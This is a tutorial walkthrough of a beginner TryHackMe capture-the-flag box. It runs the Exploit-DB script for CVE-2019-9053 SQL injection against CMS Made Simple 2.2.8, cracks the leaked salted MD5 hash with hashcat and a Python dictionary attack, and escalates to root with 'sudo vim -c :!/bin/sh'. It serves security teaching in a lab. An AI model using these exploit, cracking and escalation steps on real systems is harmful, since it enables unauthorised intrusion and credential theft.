Understanding CTF TryHackMe
Capture The Flag (CTF) challenges are hands-on cybersecurity exercises where participants solve security tasks to discover hidden "flags"—typically text strings that prove successful exploitation. This walkthrough demonstrates a beginner-level TryHackMe CTF, covering essential penetration testing skills: service identification, vulnerability exploitation, and privilege escalation.
Key Points
- CTF challenges simulate real-world security scenarios for practical learning
- Service scanning with tools like nmap reveals attack surfaces
- Vulnerability research identifies exploitable weaknesses in discovered services
- Privilege escalation techniques elevate access from standard user to root
- Documentation of each step builds a repeatable methodology
Phase 1: Reconnaissance and Service Identification
The first phase of any penetration test involves mapping the target's attack surface through network scanning.
Scanning for Open Services
Use nmap with the -A option, which combines version detection, OS detection, default NSE scripts and traceroute, to identify running services and their versions. Note that -A still scans only nmap's default top 1,000 ports (add -p- to cover all 65,535) and its scripts are noisy on a monitored network:
nmap -A 10.10.82.113
Sample Output:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Key Findings:
- Two services on ports below 1000 (FTP on 21, HTTP on 80)
- SSH listening on the non-standard port 2222, so a plain `ssh host` will fail later; note the port now
- Version strings captured for vulnerability research: vsftpd 3.0.3, Apache httpd 2.4.18 and OpenSSH 7.2p2
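The three findings above are exactly the checks worth automating once a scan returns more than a handful of ports. The following Python is an added example and not part of the original walkthrough: it parses the nmap service table shown above (embedded as a constructed sample string), flags any service listening off its default port, and lists the version strings to take to a CVE database. DEFAULT_PORTS is an assumed minimal table covering only the services on this box.

```python
import re
from dataclasses import dataclass

# Constructed sample: the service table from the nmap -A output above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
"""

# Assumed minimal map of IANA default ports; extend for the services you meet.
DEFAULT_PORTS = {"ftp": 21, "ssh": 22, "http": 80, "https": 443}

# One nmap service line: "<port>/<proto> <state> <service> [version...]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_nmap(text):
    """Return the open services in nmap's normal (non-XML) output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group("state") == "open":
            services.append(
                Service(
                    int(m.group("port")),
                    m.group("proto"),
                    m.group("state"),
                    m.group("service"),
                    m.group("version").strip(),
                )
            )
    return services


def nonstandard_ports(services):
    """Services whose port differs from the default for that service name."""
    return [s for s in services if s.name in DEFAULT_PORTS and DEFAULT_PORTS[s.name] != s.port]


def research_targets(services):
    """(service, version) pairs to look up in a CVE database / Exploit-DB."""
    return [(s.name, s.version) for s in services if s.version]


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    print(f"{sum(1 for s in found if s.port < 1000)} services below port 1000")
    for s in nonstandard_ports(found):
        print(f"non-standard port: {s.name} on {s.port}/{s.proto}")
    for name, version in research_targets(found):
        print(f"research: {name} -> {version}")
```

Feed it `nmap -A target` output saved with -oN; for larger scans parse the XML (-oX) instead, but the normal format is enough to spot the 2222/ssh case that trips up a default ssh command.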
Phase 2: Web Application Discovery
With HTTP service confirmed, enumerate hidden directories to find potential entry points.
Directory Enumeration
Use gobuster to discover hidden web directories:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.82.113
Result: The /simple directory hosts CMS Made Simple version 2.2.8
Critical Finding: This version is affected by CVE-2019-9053, an unauthenticated blind SQL injection in the CMS's News module that can leak stored credentials.
Phase 3: Exploitation
Understanding the Vulnerability
CVE-2019-9053 is an unauthenticated, time-based blind SQL injection in the News module of CMS Made Simple 2.2.8 (versions before 2.2.10 are affected). Because it is blind, the exploit infers the database contents one character at a time from response delays, so pulling out a username, password hash and salt takes minutes rather than seconds, and a lossy connection can yield garbled characters; re-run it if the output looks wrong.
Vulnerability Type: SQL Injection (SQLi)
Executing the Exploit
Download the exploit (Exploit-DB ID 46635) and run it with Python 2 against the CMS base URL:
python2 46635.py -u http://10.10.82.113/simple
Extracted Credentials:
[+] Salt: 1dac0d92e9fa6bb2
[+] Username: mitch
[+] Password Hash: 0c01f4468bd75d7a84c7eb73846e8d96
Password Cracking
Use hashcat mode 20, md5($salt.$pass), which matches how this CMS prepends the site salt to the password before hashing; mode 10 is the other concatenation order, md5($pass.$salt), and will simply never match. Supply the hash and salt as hash:salt; -a 0 selects a straight dictionary attack and -O enables optimized kernels (faster, but caps candidate length, which is fine for rockyou):
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt
Cracked Password: secret
Valid Credentials: mitch:secret
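To see what -m 20 actually computes, and why picking the wrong mode fails silently, here is an added Python example (not from the walkthrough or the exploit script) that reproduces the salted-MD5 dictionary attack. WORDLIST is a constructed stand-in for rockyou.txt; crack_any_order tries both concatenation orders (hashcat modes 20 and 10) and reports which one matched. The main block feeds it the hash and salt reported above; run it with the real rockyou.txt to reproduce hashcat's result.

```python
import hashlib

# Constructed mini wordlist standing in for rockyou.txt (assumed; rockyou has ~14M lines).
WORDLIST = ["password", "123456", "letmein", "secret", "qwerty"]


def md5_salt_pass(salt, password):
    """hashcat -m 20: md5($salt.$pass), the order CMS Made Simple uses."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def md5_pass_salt(salt, password):
    """hashcat -m 10: md5($pass.$salt), the other concatenation order."""
    return hashlib.md5((password + salt).encode()).hexdigest()


def crack(target_hash, salt, wordlist, hash_func=md5_salt_pass):
    """Straight dictionary attack (-a 0): return the first candidate that hashes to target."""
    target = target_hash.strip().lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if hash_func(salt, candidate) == target:
            return candidate
    return None  # exhausted the list; wrong wordlist or wrong hash mode


def crack_any_order(target_hash, salt, wordlist):
    """Try both salt orders; return (hashcat_mode, password) or None."""
    for mode, func in ((20, md5_salt_pass), (10, md5_pass_salt)):
        found = crack(target_hash, salt, wordlist, func)
        if found is not None:
            return mode, found
    return None


def load_wordlist(path):
    """Stream a real wordlist such as rockyou.txt without holding it in memory."""
    with open(path, "r", encoding="latin-1") as fh:
        for line in fh:
            yield line.rstrip("\n")


if __name__ == "__main__":
    # Hash and salt as reported by the exploit in the walkthrough above.
    target = "0c01f4468bd75d7a84c7eb73846e8d96"
    salt = "1dac0d92e9fa6bb2"
    print(crack_any_order(target, salt, WORDLIST))
    # print(crack_any_order(target, salt, load_wordlist("/usr/share/wordlists/rockyou.txt")))
```

The mode choice is the caveat to remember: an unsalted MD5 mode (-m 0) or the reversed order (-m 10) runs to completion against rockyou with no error and no result, which looks like a strong password rather than an operator mistake.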
Phase 4: Initial Access
SSH Authentication
Connect to the target using the discovered credentials on the non-standard SSH port:
ssh mitch@10.10.82.113 -p 2222
User Flag Retrieval
Once authenticated, locate and read the user flag:
ls
cat user.txt
User Flag: G00d j0b, keep up!
System Enumeration
Identify other users on the system:
cd /home && ls
Additional User Found: sunbath
Phase 5: Privilege Escalation
Identifying Escalation Vectors
Check for sudo permissions assigned to the current user:
sudo -l
Output:
(root) NOPASSWD: /usr/bin/vim
Security Misconfiguration: The user mitch can execute vim as root without a password. Any program that can spawn a subprocess or write arbitrary files is a full root escalation when allowed this way, and GTFOBins catalogues vim among them.
Exploiting Vim for Root Access
vim runs shell commands with :!command, and when vim itself is started via sudo that child shell inherits root. The -c flag executes the command as soon as vim starts, so no interactive step is needed:
sudo vim -c ':!/bin/sh'
This opens vim as root and immediately executes /bin/sh, dropping you into a root shell (confirm with id). Typing :!/bin/sh or :shell inside an interactive sudo vim session gives the same result. On a real system the fix is never to grant sudo on an editor; use sudoedit, which runs the editor as the invoking user on a temporary copy of the file.
Root Flag Retrieval
Navigate to the root directory and capture the final flag:
cd /root
cat root.txt
Root Flag: W3ll d0n3. You made it!
CTF Methodology Summary
| Phase | Objective | Key Tools |
|---|---|---|
| Reconnaissance | Identify services and versions | nmap, gobuster |
| Vulnerability Research | Find exploitable weaknesses | CVE databases, Exploit-DB |
| Exploitation | Gain initial access | Custom exploits, hashcat |
| Post-Exploitation | Enumerate system information | ls, sudo -l, find |
| Privilege Escalation | Achieve root access | GTFOBins, misconfiguration abuse |
Best Practices for CTF Success
Systematic Approach:
- Always start with comprehensive reconnaissance
- Document every command and its output
- Research CVEs for all identified software versions
Security Awareness:
- Understand why vulnerabilities exist (e.g., input validation failures)
- Learn defensive measures alongside offensive techniques
- Practice in legal, authorized environments only
Continuous Learning:
- Review writeups from other participants after completing challenges
- Experiment with different tools and techniques
- Build a personal knowledge base of common vulnerabilities
Learn More
Expand your penetration testing skills with these platforms:
| Platform | Focus Area | Best For |
|---|---|---|
| TryHackMe | Guided CTF challenges | Beginners to intermediate |
| Hack The Box | Real-world scenarios | Intermediate to advanced |
| OverTheWire | Linux security fundamentals | Command-line proficiency |
| VulnHub | Downloadable vulnerable VMs | Offline practice |
Additional Resources:
- GTFOBins: Database of Unix binaries for privilege escalation
- PayloadsAllTheThings: Repository of attack payloads and bypasses
- OWASP Top 10: Essential web application security risks
Legal Notice: Only practice penetration testing on systems you own or have explicit written permission to test. Unauthorized access is illegal.